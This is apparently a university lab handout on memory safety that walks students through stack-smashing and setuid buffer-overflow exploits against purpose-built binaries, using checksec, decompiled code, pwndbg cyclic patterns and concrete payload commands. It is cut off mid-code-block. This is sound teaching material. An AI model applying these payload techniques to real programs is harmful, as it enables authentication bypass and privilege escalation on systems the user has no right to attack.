Objectives and Logistics

Lab Presentation

The goal of this lab is to learn about and put in practice concepts about memory safety. We will explore a series of attacks exploiting memory vulnerabilities in binary programs. This lab is composed of 3 main exercises:

Stack Smashing: how a buffer overflow on the stack can be exploited by an attacker to take over the execution flow.
Setuid Exploitation: how to subvert programs executing with root privileges to bypass file system permission checks.
Temporal Safety Exploitation: how to exploit use after free bugs to hijack the execution flow of programs.

The first and third exercises are divided into two parts: a guided part with detailed instructions on how to proceed, and an advanced part which is less guided. The second exercise has only a guided part. You can access each exercise from the left menu. Strictly speaking, the exercises are independent of each other, but we strongly recommend doing them in order. If you are stuck in the advanced part of an exercise, it's OK to start the next one though.

⚠️ Ethical Use Disclaimer

Although part of this lab exercise introduces techniques that are commonly associated with offensive security, their purpose in this context is purely educational. Our goal is to help you understand how attackers operate, so you can build stronger, more secure systems.

You are expected to use the knowledge and skills from this lab responsibly and ethically. Any use of these techniques outside of authorised, educational, or professional penetration testing contexts is strictly prohibited and may be illegal.

Submission Instructions

The deliverable for this exercise is a series of passwords. The submission is made through the CS Department’s Gitlab. You should have a fork of the repository named 60261-lab2-s-memory-safety_<your username>. The passwords should be submitted in a CSV file, that should be pushed alongside the C source code on the main branch. You can find an empty skeleton for such a file here. Submission details are given in the relevant parts of this exercise. To indicate that the submission is ready to be marked create a tag named lab2-submission.

The deadline for this assignment is Friday 31/10 2pm London time.

A few important points regarding the submission:

⚠️ Make sure you push to the precise repository mentioned above and not another one (do not fork it or create a new repo), and to tag your submission properly.

⚠️ The submission is to be made through GitLab only, there is no need to submit anything to Canvas.

⚠️ You need some basic knowledge of git and GitLab to submit that exercise. In the unlikely case you are not familiar with these tools, see some guidance here.

Failure to follow these instructions is likely to result in a mark of 0 for this exercise.

For any issues or questions, feel free to get in touch with the instructor through the discussion board on Canvas or during office hours (see the schedule on Canvas for their time and location). You can also contact your student representatives.

High-Level Marking Scheme

Part	Marks
Stack Smashing (Guided)	/3.5
Stack Smashing (Advanced)	/5
Setuid Programs (Guided)	/3
Temporal Safety (Guided)	/3.5
Temporal Safety (Advanced)	/5
Total:	/20

Intended Learning Outcomes (ILOs)

By the end of this lab, students will be able to:

Analyse and reverse-engineer compiled binaries to understand their behaviour and detect vulnerabilities such as buffer overflows and use after free.
Demonstrate how these vulnerabilities can be exploited to bypass security measures by e.g. hijacking the execution flow of a program.
Understand the security implications of these vulnerabilities and reason about how to minimise the chances of introducing them when designing and implementing systems software.

Required Setup

This exercise requires the same setup as for lab 1.

Guided Example

Stack smashing is a type of buffer overflow attack where an attacker overwrites a program's call stack, typically by overflowing a buffer. By doing so, the attacker can corrupt a return address on the stack and hijack the program's control flow, e.g. to bypass a security check, spawn a shell, or more generally execute malicious code. A classic explanation of the stack smashing attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.

To demonstrate an example of stack smashing, we assume the following scenario: we consider a program containing a security check (e.g. password or license key verification). We (the attacker) do not know the secret that would let us pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Hence, our goal is to bypass the security check by taking over the program's execution flow. The program is distributed in binary form, and we do not have access to its source code.

Getting and Running the Target Binary

Download this binary. After the download you may need to give it execution rights with chmod +x smashme01. This program contains a password check. The user enters their password attempt as a command line parameter:

./smashme01
usage: ./smashme01 <password>

./smashme01 test
Authentication failed

Analysing the Target Binary with `checksec`

Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.

If checksec is not already on your machine, install it:
mkdir -p ~/Software
wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz
cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec
echo "alias checksec=~/Software/checksec/checksec.bash" >>  ~/.bashrc
source ~/.bashrc
Adapt these steps to your environment (e.g. you may use a different shell).

checksec --file=smashme01
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   5 Symbols	  No	0		2		smashme01

This looks promising, here we can see that:

The stack canary, which is a protection against buffer overflows on the stack, is disabled. It means we will be able to exploit such overflows.
Position Independent Executable (PIE) support is disabled. This build-time option, when enabled, allows the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout throughout subsequent executions, which makes it easier to study.
Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.

Disassembling and Decompiling the Target Binary

If we disassemble the program with objdump, we can see that it is made up of a few functions, including:

main
init
validate
do_important_stuff
Other functions whose names cannot be recovered

Let's study a few of these functions in more detail. Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do. Let's start by looking at main. Decompiled by RetDec it looks like this (you may see different values for the addresses):

// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
    int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
    init(*v1);
    if ((int32_t)validate(*v1) == 0) {
        // 0x401b0b
        puts("Authentication failed");
    } else {
        // 0x401aff
        do_important_stuff();
    }
    // 0x401b1a
    return 0;
}

We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1]), passes it to init, then to validate. If validate returns 0, it prints Authentication failed, else it calls do_important_stuff. Decompiled, do_important_stuff looks like this:

int64_t do_important_stuff(void) {
    // 0x401a06
    puts("Authentication successful");
    // ...
}

Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow. Now let's look at validate:

int64_t validate(int64_t str) {
    int64_t result = 0; // 0x4018bc
    if (strlen((char *)str) == 40) {
        // 0x4018c5
        int64_t str2; // bp-152, 0x401885
        function_4016aa(str, &str2);
        result = memcmp(&g1, &str2, 40) == 0;
    }
    // 0x401905
    return result;
}

This function performs a length check on the password attempt (str), then passes it as parameter to another function (function_4016aa) alongside the address of a local variable str2. The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something else than 0), and 1 if it succeeds (memcmp returned 0).

Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded. The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password. We can also conclude that function_4016aa implements the hashing logic.
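The structure of validate can be sketched in Python as follows. This is only an illustration under stated assumptions: SHA-256 is a stand-in for the custom routine function_4016aa (whose actual algorithm is unknown), and the names hash_attempt, STORED_HASH and the example secret are hypothetical.

```python
import hashlib

PASSWORD_LENGTH = 40  # length enforced by the strlen check in validate


def hash_attempt(attempt: bytes) -> bytes:
    """Stand-in for function_4016aa (ASSUMPTION: the real routine is custom)."""
    return hashlib.sha256(attempt).digest()


# Hypothetical secret, used only to build a reference hash playing the role of g1.
_EXAMPLE_SECRET = b"s" * PASSWORD_LENGTH
STORED_HASH = hash_attempt(_EXAMPLE_SECRET)


def validate(attempt: bytes) -> int:
    """Return 1 if the attempt hashes to the stored hash, 0 otherwise."""
    if len(attempt) != PASSWORD_LENGTH:
        return 0  # wrong length: rejected before any hashing happens
    return int(hash_attempt(attempt) == STORED_HASH)


if __name__ == "__main__":
    print(validate(b"test"))           # rejected by the length check
    print(validate(_EXAMPLE_SECRET))   # accepted
```

Note that only the hash is stored: reading STORED_HASH out of the binary does not directly reveal the password.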

Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time. Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex). Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.

Let's now have a look at init:

int64_t init(int64_t str2) {
    // 0x401a6e
    int64_t str; // bp-40, 0x401a6e
    return (int64_t)strcpy((char *)&str, (char *)str2);
}

This function calls strcpy to copy the password attempt coming from the command line (str2) into str, which is located on the stack (bp is the base pointer, which at runtime points to the base of the function's stack frame). strcpy keeps copying bytes until it reaches the null terminator of the source string, regardless of the size of the destination. Here str is a buffer of fixed size, and the program makes no attempt to check that str2 fits in it, so a long enough password attempt will overflow that buffer.

To try to trigger the overflow, call the program with an abnormally long string given as password attempt:

./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1]    20866 segmentation fault  ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Function Calls and the Stack

Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns:

So with our target program, to bypass the validation of the password attempt, our goal will be to overflow the buffer through the strcpy during init's execution in such a way that the return address is replaced with the address of our target: do_important_stuff.

By doing so, when init returns, the CPU will jump to do_important_stuff, bypassing the password check.
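To make the mechanism concrete, here is a toy Python model of a vulnerable stack frame. It is a simulation under simplifying assumptions, not the real process memory: the buffer size (16 bytes) is chosen arbitrarily for illustration, ORIGINAL_RETURN is just an example address inside main, and all helper names are hypothetical. Only the target 0x401a06 comes from the decompiled output above.

```python
import struct

BUF_SIZE = 16        # ASSUMPTION: arbitrary buffer size for illustration
SAVED_RBP_SIZE = 8   # saved base pointer sits between buffer and return address
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE

ORIGINAL_RETURN = 0x401ae8  # example address somewhere in main
TARGET = 0x401a06           # do_important_stuff in the decompiled output


def make_frame(return_address: int) -> bytearray:
    """Frame from low to high addresses: buffer | saved RBP | return address."""
    frame = bytearray(RET_OFFSET + 8)
    struct.pack_into("<Q", frame, RET_OFFSET, return_address)
    return frame


def unchecked_strcpy(frame: bytearray, src: bytes) -> None:
    """Mimic strcpy: copy up to the first null byte, then add a terminator.

    The size of the destination buffer is never consulted.
    """
    data = src.split(b"\x00", 1)[0] + b"\x00"
    frame[0:len(data)] = data


def read_return_address(frame: bytearray) -> int:
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]


if __name__ == "__main__":
    frame = make_frame(ORIGINAL_RETURN)
    unchecked_strcpy(frame, b"xxx")
    print(hex(read_return_address(frame)))  # short input: return address intact

    frame = make_frame(ORIGINAL_RETURN)
    unchecked_strcpy(frame, b"A" * RET_OFFSET + struct.pack("<Q", TARGET))
    print(hex(read_return_address(frame)))  # long input: return address replaced
```

In this model the copy stops at the first null byte of the payload, as strcpy would; the upper bytes of the return address slot already hold zeros, which is why the overwrite still yields the intended address.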

Understanding the Address Space Layout

Attack Payload: Overview

We have control over the data that will be written on the stack through the overflow: indeed that data comes from the command line argument passed to the program. The question here is what exactly should we pass as command line parameter so that the address of the function we want to jump to ends up written in the exact return address slot. This is our payload, and we should determine 1) how long should it be and 2) what should it contain for the attack to succeed. Our payload should be a concatenation of two things:

A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
The address of do_important_stuff to be written in the return address slot.

Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program does not support PIE so the address of do_important_stuff will always be the same among different invocations of the program. It can be determined e.g. in objdump's output:

objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:

Here its address is 0x401a06 (it may be different on your computer).

To determine how much padding our payload should contain before that address, we need to understand the memory layout on the stack at the time the overflow occurs. To that aim we will use GDB and an add-on called Pwndbg, which offers a better interface and many helpful features for reverse engineering.

Installing and Running Pwndbg

To install Pwndbg download a release as follows:

mkdir -p ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc

Pwndbg can then be launched as follows:

pwndbg smashme01
pwndbg>

To explore Pwndbg's interface, place a breakpoint on main and run the program until it is hit:

pwndbg> break main
pwndbg> run
Breakpoint 1, 0x0000000000401a9c in main ()

Once the breakpoint is hit Pwndbg will display a lot more information vs. vanilla GDB. The screen is divided into 4 main blocks:

REGISTERS displays the content of the registers: the general purpose ones RAX to R15, the base pointer RBP, the stack pointer RSP, as well as the instruction pointer RIP.
DISASM displays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.
STACK gives the content of the stack, one stack slot per line. The address of each slot is given on the left, and its content on the right. The first line represents the top of the stack; notice that its address is the same as the content of the stack pointer register RSP.
BACKTRACE shows the function call stack: the CPU is currently running code belonging to main, which was called by __libc_start_call_main, which itself was called by __libc_start_main, which was called by _start. These last 3 functions implement the C standard library code that runs before main is invoked.

Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones. You can explore these commands on this cheat sheet and on the relevant documentation.

Determining the Amount of Padding

Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.

pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx

When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:

 ► 0x401a8c <init+30>    call   strcpy@plt                  <strcpy@plt>
        dest: 0x7fffffffdaf0 ◂— 0
        src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */

Pwndbg is aware of the calling convention and indicates the value of strcpy's parameters:

The source src points to the dummy password attempt we entered, xxx
The destination dest points to the buffer that we are going to overflow, here its value is 0x7fffffffdaf0.

Now to understand how much padding we need to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack. The return address is stored right above the saved base pointer, i.e. at the address held in RBP plus 8, so we can display it with the following command:

pwndbg> x/gx $rbp+8
0x7fffffffdb18:	0x0000000000401ae8

Remember that the stack grows down: the return address was pushed before the saved base pointer, so it sits at a higher address, in the 8 bytes starting at RBP + 8. The return address is 0x401ae8 (the location in main where execution resumes once init returns), and it is stored on the stack at 0x7fffffffdb18. We can now compute the distance between the return address slot at 0x7fffffffdb18 and the first byte of the buffer we are going to overflow, at 0x7fffffffdaf0. In a separate terminal:

$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40

Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.

Smashing the Stack

We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:

$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'

The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte data type is stored at the lowest memory address.
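The byte order can be checked with a few lines of Python. This is a small sketch using the standard struct module; the address is the one found above and may differ on your machine.

```python
import struct

target = 0x401a06  # address of do_important_stuff found with objdump

# "<Q" means: little-endian, unsigned 64-bit integer
encoded = struct.pack("<Q", target)

# Print the bytes in the order they will sit in memory (lowest address first)
print(" ".join(f"{b:02x}" for b in encoded))

# For comparison, the big-endian encoding stores the bytes in reading order
big_endian = struct.pack(">Q", target)
print(" ".join(f"{b:02x}" for b in big_endian))
```

The first line printed matches the escape sequence used in the command above; the second shows what the bytes would look like on a big-endian machine.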

The program should display the password that you have to submit to validate the exercise.

An Easier Way to Determine Padding Size

Determining the amount of padding required manually as we did can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern. This is a long, unique, non-repeating sequence of characters, that we will use to overflow the buffer. Looking at what part of that sequence the execution flow ends up jumping to after the return address is overwritten will let Pwndbg compute easily the distance between the start of the buffer overflow, and the return address location.

To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg. This is an example for generating 200 bytes of cyclic pattern:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

⚠️ For some reason using cyclic before having run the program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg make sure to type run at least once before using cyclic.

Your cyclic function may generate a different pattern. Now run the program and copy-paste the pattern as its command line parameter:

pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Part of this pattern will overwrite the return address, then the CPU will try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will show us where the CPU tried to jump:

 ► 0x401a93 <init+37>    ret                                <0x6161616161616166>

This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:

pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

And there we have it: this is the distance between the start of the overflown buffer and the return address, i.e. the amount of padding required for our payload.
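For the curious, the idea behind cyclic can be sketched in Python. The code below uses the standard de Bruijn sequence construction over the lowercase alphabet with 8-character subsequences, which reproduces the pattern shown above; Pwndbg's actual implementation may differ, and the function names here are hypothetical.

```python
from itertools import islice
import string


def de_bruijn(alphabet: str, n: int):
    """Yield a de Bruijn sequence: every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 8) -> str:
    """Return the first `length` characters of the pattern."""
    return "".join(islice(de_bruijn(string.ascii_lowercase, n), length))


def cyclic_find(value: int, length: int = 200, n: int = 8) -> int:
    """Locate a crashed 64-bit value (as shown next to ret) in the pattern."""
    # The value was read from memory as a little-endian integer
    needle = value.to_bytes(n, "little").decode("ascii")
    return cyclic(length, n).find(needle)


if __name__ == "__main__":
    print(cyclic(32))
    print(cyclic_find(0x6161616161616166))
```

Because every 8-character window appears only once in the pattern, the position of the window that landed in the return address slot is unambiguous.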

Quick Payload Generation with Python

Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload to a file:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)

Here 40 is the amount of padding added, and 0x401a06 is our jump target.

Submission Instructions

Input the password extracted on the corresponding line of the CSV file in the submission git repository, i.e.:

smashme01,password-here

Advanced Stack Smashing

The three following binaries present a very similar structure to the one we exploited in the guided part of this exercise. In particular, they all present a stack-based buffer overflow, and they will display the password if you exploit that overflow in order to jump to the proper location in the program. Once you have found all the passwords, add them to your submission.

smashme02
smashme03 (a bit harder)
smashme04 (harder)

Submission

Input the passwords found in the corresponding lines of the CSV file in the submission git repository, i.e.:

smashme02,password-for-smashme02-here
smashme03,password-for-smashme03-here
smashme04,password-for-smashme04-here

Setuid Programs

We saw in the last exercise that we can use stack overflows to bypass authentication methods. Here, we assume a scenario where the goal is to bypass file system permission checks and list the content of a directory we are not supposed to access. To that aim we are going to exploit a particular type of program that runs with the permissions of the user owning it, and not with the permissions of the user executing it: setuid binaries.

Understanding Linux File Permissions

Before we start working with setuid programs, let's explore how Linux file permissions and setuid work.

File Ownership

On a Linux system, every file and directory has 2 different kinds of owners:

User owner (UID) - The account that "owns" the file.
Group owner (GID) - A group of accounts that share certain permissions on the file.

Taking the example of a computer shared between different users, e.g. a lab machine at the University, you have a user account and your personal files in your home folder are set to be accessible only by your account: you cannot access files belonging to other students, and neither can they access your own files. Students also cannot access the files belonging to the system administrator (root). The administrator can assign students to specific groups, for example comp60261, so that file permissions for all users on the course can be set simultaneously.

You can view who owns a file using ls -l. Let's have a look at what this command says when we examine the cp command's binary:

$ ls -l /usr/bin/cp
-rwxr-xr-x 1 root root 151152 Sep 20  2022 /usr/bin/cp

Breaking this down:

-rwxr-xr-x - The first part shows us the type and permission bits
1 - The number of hard links
root - The user owner
root - The group owner
151152 - The file size in bytes
The rest is the modification timestamp and the file/directory name.

Permission Bits

To see what permissions each of the types of users has, we refer to the permission bits. They are displayed as a series of 10 characters. The first letter is the file type: - for a regular file, d for a directory, l for a symbolic link, etc.

Next come the permissions themselves: 3 blocks of 3 characters each. The first block relates to the permissions of the file's owner, the second to the permissions of the file's group, and the third to the permission of all other users not falling within the 2 aforementioned categories.

Each block has 3 characters. The first relates to read permission: the entity concerned by the block can have read access to the file (r) or not (-). The second character denotes write access (w) or not (-). The third denotes execution access (x) or not (-). For a file it means the concerned entity can run it as a program (e.g. with ./file). For a folder it means the entity can enter that folder and access the files it contains; listing the content of a folder requires the read permission.

This is all illustrated here:

So we can see that the file /usr/bin/cp is readable, writable, and executable by its owner root, and can only be read and executed by all other users including other members of the root group.

Numeric permission notations

Permissions can also be written as three digits, one per block. Each digit is the sum of the values of the permissions granted in that block:

r = 4
w = 2
x = 1

These can be added together to represent a combination of permissions. For example:

rwx = 4 + 2 + 1 = 7
rw- = 4 + 2 = 6
r-x = 4 + 1 = 5
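The conversion can be sketched in a few lines of Python. This is a minimal illustration with hypothetical function names; it only handles the r, w, x and - characters, not special bits such as setuid.

```python
PERMISSION_VALUES = {"r": 4, "w": 2, "x": 1}


def block_to_digit(block: str) -> int:
    """Convert one 3-character block such as 'r-x' to its digit."""
    return sum(PERMISSION_VALUES[c] for c in block if c != "-")


def symbolic_to_numeric(perms: str) -> str:
    """Convert 9 permission characters (owner, group, others) to 3 digits."""
    if len(perms) != 9:
        raise ValueError("expected 9 characters, e.g. 'rwxr-xr-x'")
    return "".join(str(block_to_digit(perms[i:i + 3])) for i in (0, 3, 6))


if __name__ == "__main__":
    # Permissions of /usr/bin/cp from the listing above, without the file type
    print(symbolic_to_numeric("rwxr-xr-x"))
    # Read/write for the owner only
    print(symbolic_to_numeric("rw-------"))
```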

You can set file permissions numerically with chmod. For example if we want to create a file containing sensitive data and have it being accessible only by our user in read/write mode:

$ echo "secret" > file.txt
$ chmod 600 file.txt

Or alternatively using letters:

$ chmod u+x file.txt   # Add(+) the execute(x) permission to the user(u)
$ chmod g-w file.txt   # Remove(-) the write(w) permission from the group(g)

You can also change the owner and group of a file with chown and chgrp:

chown emily file.txt   # Change the owner of file.txt to emily
chgrp comp60261 file.txt    # Change the group of file.txt to comp60261

`setuid` bit

For certain programs, the x of the execution permissions is replaced by an s. This is the setuid bit: it indicates that the program in question will run with the level of privileges (i.e. file system permissions) of the file owner instead of the privileges of the user who runs it.

To see an example of this, see the permissions of the /usr/bin/passwd program, which allows users to change their password:

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 68248 Mar 23  2023 /usr/bin/passwd

This tells us that when the passwd file is executed, it runs with the privileges of its owner, root. This is necessary because the system's passwords are stored in a file that can understandably only be written by root, /etc/shadow. However, non-root users must still be able to change their passwords, i.e. to run passwd. As a result system permissions are set up so that:

/etc/shadow is only accessible by root.
passwd is owned by root and executable by all users.
When passwd executes it actually runs with the permissions of root, hence it can edit /etc/shadow.

Although it is necessary for certain scenarios such as the one we just described, letting users execute programs with root permissions is obviously quite concerning from the security point of view. This is why you will find a very small number of setuid programs on a standard Linux system.
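The setuid bit is stored alongside the regular permission bits in the file mode. The short Python sketch below uses the standard stat module to show how it appears in both the numeric and the ls -l style notations; the two mode values are built by hand for illustration rather than read from a real file.

```python
import stat

# Regular executable, rwxr-xr-x (755)
regular_mode = stat.S_IFREG | 0o755
# Same permissions with the setuid bit added (4755)
setuid_mode = stat.S_IFREG | stat.S_ISUID | 0o755


def is_setuid(mode: int) -> bool:
    """Return True if the setuid bit is set in a file mode."""
    return bool(mode & stat.S_ISUID)


if __name__ == "__main__":
    for mode in (regular_mode, setuid_mode):
        # stat.filemode renders a mode the same way ls -l does
        print(stat.filemode(mode), oct(stat.S_IMODE(mode)), is_setuid(mode))
```

On a real system the mode of a file can be obtained with os.stat(path).st_mode and passed to the same functions.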

In this exercise, we will exploit a vulnerability in a setuid program to access, as a non-privileged user, files that are supposed to be accessible only by root.

Exercise Setup

For this exercise you need to run a particular Docker image: olivierpierre/comp60261-setuid. To that aim install the Docker command line engine and in a terminal run:

docker run -it olivierpierre/comp60261-setuid

You can then optionally attach vscode to the container. Open a workspace in the folder /home/user/workspace.

Note: this is an x86-64 Docker image, which may not work if you have an ARM-based MacBook. If you have an ARM MacBook an alternative is to use GitHub CodeSpaces, the exercise should be doable with the free tier available with GitHub student accounts. To launch a CodeSpace with the exercise's image, click here.

A third option (with Docker installed on an x86-64 machine) is to run this devcontainer. Once vscode has loaded the devcontainer, have it load the proper workspace by bringing up a terminal and entering:

code /home/user/workspace

Our Target Program

The setuid program we aim to exploit is in the workspace folder, named setuid01:

$ ls -l
total 28
drwx------ 1 root root  4096 Aug 20 14:58 private
drwxr-xr-x 1 user user  4096 Aug 20 15:04 public
-rwsr-xr-x 1 root root 14624 Aug 20 14:59 setuid01

There are also 2 folders: one named public is accessible by your user, and contains 3 files owned by that user:

$ ls public/
bread  cake  pasta

These are cooking recipes for various types of meals. The other, private, is owned by root and inaccessible by our user:

$ ls private/
ls: cannot open directory 'private/': Permission denied

The goal of the exercise is to list the content of that folder by exploiting the setuid binary.

The binary takes a name as command line parameter and lists the available recipes, i.e. the files contained in the public directory:

$ ./setuid01 
Usage: ./setuid01 <your name>
$ ./setuid01 pierre
Hello pierre, the recipes available are:
total 12
-rw-r--r-- 1 root root 58 Aug 18 15:00 bread
-rw-r--r-- 1 root root 55 Aug 18 15:00 cake
-rw-r--r-- 1 root root 49 Aug 18 15:00 pasta

This looks very much like the output of ls -l, and it is likely that setuid01 is calling that program under the hood.

Decompiling `setuid01`

Let's decompile that program with RetDec:

retdec-decompiler setuid01
cat setuid01.c

From RetDec's output we can see that the program indeed invokes the ls binary with execlp, which is a libc function to run binaries. The binary to run, and its command line arguments are passed as follows:

int execlp(char *file, char *arg0, ..., (char *) NULL);

execlp takes the name of the binary (searched in the $PATH), followed by a list of arguments -- with the second argument (here arg0) being always the name of the binary i.e. the same as the first. For example to invoke the command cat /home/pierre/test.txt one would call:

execlp("cat", "cat", "/home/pierre/test.txt", NULL);

As one can observe the list of arguments for the invocation of execlp in RetDec's output seems incomplete, e.g. the NULL closing argument is missing, so is the name of the target folder. Decompiling is never an exact science, and we are hitting one of RetDec's limitations here. Ghidra is a bit better at decompiling setuid01 here. It outputs the following:

bool main(int param_1,undefined8 *param_2) {
  char local_28 [24];
  undefined8 local_10;
  
  local_10 = 0x63696c627570;
  local_28[0] = '\0';
  // ...
  if (param_1 < 2) {
    printf("Usage: %s <your name>\n",*param_2);
  }
  else {
    strcpy(local_28,(char *)param_2[1]);
    printf("Hello %s, the recipes available are:\n");
    execlp("ls","ls",&DAT_00402046,&local_10,0);
  }
  return param_1 < 2;
}

Now we can see the other parameters passed to execlp. Double-clicking on DAT_00402046 in Ghidra will show that it is -l, the first command line parameter passed to ls.

The second command line parameter is local_10 and it seems at first glance to be an integer, with a value of 0x63696c627570. However, we know that execlp takes only string parameters, aside from the last one which is always NULL. We can try to interpret the value of local_10 as a C (ASCII) string, for example by using a hexadecimal to ASCII converter. The converter tells us that this value translates to cilbup. Recall that numbers are stored in a little-endian fashion on x86-64, so we need to reverse these bytes: the string is public, which is indeed the last command line parameter passed to ls.
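The same decoding can be done in Python without an online converter. This is a small sketch; the value is the one shown in Ghidra's output above.

```python
value = 0x63696c627570  # local_10 as shown by Ghidra

# Reading the hex digits left to right gives the bytes in big-endian order
as_written = value.to_bytes(6, "big").decode("ascii")
print(as_written)

# In memory, x86-64 stores the 8-byte integer least significant byte first
in_memory = value.to_bytes(8, "little")
print(in_memory)

# A C string stops at the first null byte
c_string = in_memory.split(b"\x00", 1)[0].decode("ascii")
print(c_string)
```

The two trailing null bytes of the 8-byte value conveniently act as the string terminator.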

Now we know that we have a setuid program that lists the content of a folder with root privileges. If we can replace the value of the public string with private, we will reach our goal and list the content of that folder with the permissions of the owner: root. The good thing here is that we can see an unprotected call to strcpy into local_28 from param_2[1], which is actually argv[1]. We can use that overflow to overwrite local_10: recall that the stack grows down on x86-64, so local_10 is likely located at a higher address than local_28, i.e. in the proper overflow direction.

Preparing the Payload

Let's run the program in Pwndbg (available in the Docker image) and use cyclic to check how much padding we need to reach the string containing public.

$ pwndbg setuid01
# Run the program once to avoid cyclic misbehaving
pwndbg> run
# Generate a cyclic pattern
pwndbg> cyclic 200
# Copy and paste your cyclic pattern and pass it as the command line parameter to setuid01
pwndbg> run aaaaaa # ...
ls: cannot access 'daaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa': No such file or directory
# Now let's see the offset in the pattern for what ls takes as target directory after the overflow:
pwndbg> cyclic -l daaaaaaa
Finding cyclic pattern of 8 bytes: b'daaaaaaa' (hex: 0x6461616161616161)
Found at offset 24

And we have our padding. Note that your pattern may be different so make sure to pass to cyclic -l the first 8 bytes of what ls reports it cannot access. Our payload will then be: 24 bytes of padding, then the ASCII string "private".
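The effect of this payload can be previewed with a toy Python model of main's local variables. It is a simulation under an assumption: local_10 is taken to sit immediately after the 24 bytes of local_28, which is consistent with the offset reported by cyclic. The function names are hypothetical.

```python
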